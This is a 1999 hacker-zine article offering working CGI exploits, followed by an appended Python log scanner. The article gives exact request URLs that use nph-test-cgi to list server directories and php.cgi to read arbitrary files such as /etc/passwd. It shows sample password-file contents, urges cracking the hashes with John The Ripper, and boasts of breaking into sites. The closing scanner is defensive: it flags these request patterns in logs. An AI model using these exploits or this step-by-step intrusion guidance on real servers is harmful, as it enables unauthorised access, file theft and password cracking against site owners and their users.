_________SWAT MAGAZINE ISSUE TWENTY FOUR: DECEMBER 1999_________
/ \___________________________________________/ \
/          Site Busting: CGI Exploits part I          \
/                by -=The Firestarter=-               \
-----------------------------------------------------------------------

Ok, so I was bored out of my skull and I decided to share with you some of my knowledge of CGI hacking, since that is the main method I use when it comes to "site busting". I'll detail the information as I would go about cracking sites, namely via Netscape Navigator (ok, so I'll do as much as I can with that, then telnet to my shell account and continue the attack). Each month I'll write up one or two CGI exploits that I use to crack servers. Don't expect too much though, since I'm not the greatest hacker on earth.

nph-test-cgi

This is the most common exploit I've come across in my travels around cyberspace. All that this script does is display some information on the server, i.e.:

CGI/1.0 test script report:

argc is 1. argv is *.

SERVER_SOFTWARE = Apache/1.2.6
SERVER_NAME = www.soon-2-be-hacked.net
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/nph-test-cgi
QUERY_STRING =
REMOTE_HOST = xxx.xx.xxx.xx
REMOTE_ADDR = xxx.xx.xxx.xx
REMOTE_USER =
CONTENT_TYPE =
CONTENT_LENGTH =

Ok, if you enter http:///cgi-bin/nph-test-cgi into Netscape and you are presented with the above information, then the site is running a very valuable CGI script that will give us hours of fun in exploring the system. Ok, so we can abuse this to take a peek at directories inside the target machine, very handy if you are looking for a file to swipe. Anyway, you go about this by entering:

/cgi-bin/nph-test-cgi?/*

so to see what's in the bin directory you would go to the URL:

http:///cgi-bin/nph-test-cgi?/bin/*

or perhaps you just want a look in the CGI-BIN? You would enter:

http:///cgi-bin/nph-test-cgi?*

Entering http:///cgi-bin/nph-test-cgi?/* will show you the "root" directory on the system; just alter the URL accordingly to peek inside the directories.

PHP.CGI

This was already covered by Netw0rk Bug in a past issue, so I won't go on about it too much. Basically php.cgi is a search engine with a security hole, i.e. you can view ANY file on the target machine. So

http:///cgi-bin/php.cgi?/etc/passwd

might reveal:

root:IDOSYJvnorizc:0:100:System Administrator:/:mail
hfev:IDOSYJvnorizc:33:100:Bollock bollock:/:ftp;mail
Alex:/NiYJVFNxWaVQ:33:100:Alex Garcia (M):/usr/home/Alex:mail
argga:PGlYFYglD4rf.:33:100:Argga:/usr/home/argga:mail
billc:WbxxG/2n1JHXU:33:100:Bill Carlson:/usr/home/billc:mail

All you do now is crack it using John The Ripper. But what if you're unfortunate and get:

rickl:x:33:100:Rick Laudenslager:/usr/home/rickl:mail,5
robertk:x:33:100:Robert Krutsch:/usr/home/robertk:mail,3
sandram:x:33:100:Sandra Mitchell:/usr/home/sandram:mail,5
sandy:x:33:100:Sandy Penninger:/usr/home/sandy:mail,5
schock:x:33:100:S.Chock:/usr/local/etc/httpd/htdocs/schock:ftp;mail
tedfuji:x:33:100:Ted Fujimoto (M):/usr/home/tedfuji:mail
wcrown:x:33:100:Walter Crown (M):/usr/home/wcrown:mail

Well, all is not lost! In fact certain kiddie porn sites that have been cracked by me have come across such a problem. This is where using the nph-test-cgi exploit comes in handy: you find a file that looks interesting, e.g. password.txt, accounts, creditcard, etc. and use the PHP.CGI exploit to read it. Unfortunately you need to have both PHP.CGI and NPH-TEST-CGI to do this. Oh well, have fun!
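As an added example from the server side (not part of the article or of SWAT), here is a small Python scanner that runs over constructed Apache common-log lines and flags the two request shapes the article describes: a shell glob passed to nph-test-cgi and an absolute path passed to php.cgi. The log lines, addresses, timestamps and sizes are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache common-log lines (not from the article); addresses,
# timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/1999:12:00:01 +0000] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 200 512
10.0.0.5 - - [01/Dec/1999:12:00:09 +0000] "GET /cgi-bin/nph-test-cgi?/etc/* HTTP/1.0" 200 2048
10.0.0.7 - - [01/Dec/1999:12:01:33 +0000] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 200 1400
10.0.0.9 - - [01/Dec/1999:12:02:10 +0000] "GET /index.html HTTP/1.0" 200 3000
10.0.0.5 - - [01/Dec/1999:12:03:41 +0000] "GET /cgi-bin/nph-test-cgi?%2Fbin%2F* HTTP/1.0" 404 209
"""

# Common log format: ip ident user [time] "method target proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
                    r'(?P<status>\d{3}) (?P<size>\S+)$')

def classify(target):
    """Return a reason string if the request target matches one of the two
    abuse patterns from the article, else None."""
    path, _, query = target.partition("?")
    query = unquote(query)  # %2F and friends are decoded before the shell sees them
    script = path.lower()
    # nph-test-cgi hands its arguments to the shell, so a glob metacharacter
    # in the query string is a directory-listing attempt.
    if script.endswith("/nph-test-cgi") and any(c in query for c in "*?["):
        return "nph-test-cgi directory listing via shell glob"
    # php.cgi given an absolute or traversal path returns that file's contents.
    if script.endswith("/php.cgi") and (query.startswith("/") or ".." in query):
        return "php.cgi arbitrary file read"
    return None

def scan(log_text):
    """Parse each line and collect flagged requests. A 200 on a flagged line
    means the sample script is still installed and answered the request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        reason = classify(m["target"])
        if reason:
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "target": m["target"], "reason": reason})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["status"]} {hit["target"]}  <- {hit["reason"]}')
```

A 404 on a flagged line is only a probe; a 200 means the sample script is present, and the fix in either case is to remove such test scripts from cgi-bin rather than to rely on the log.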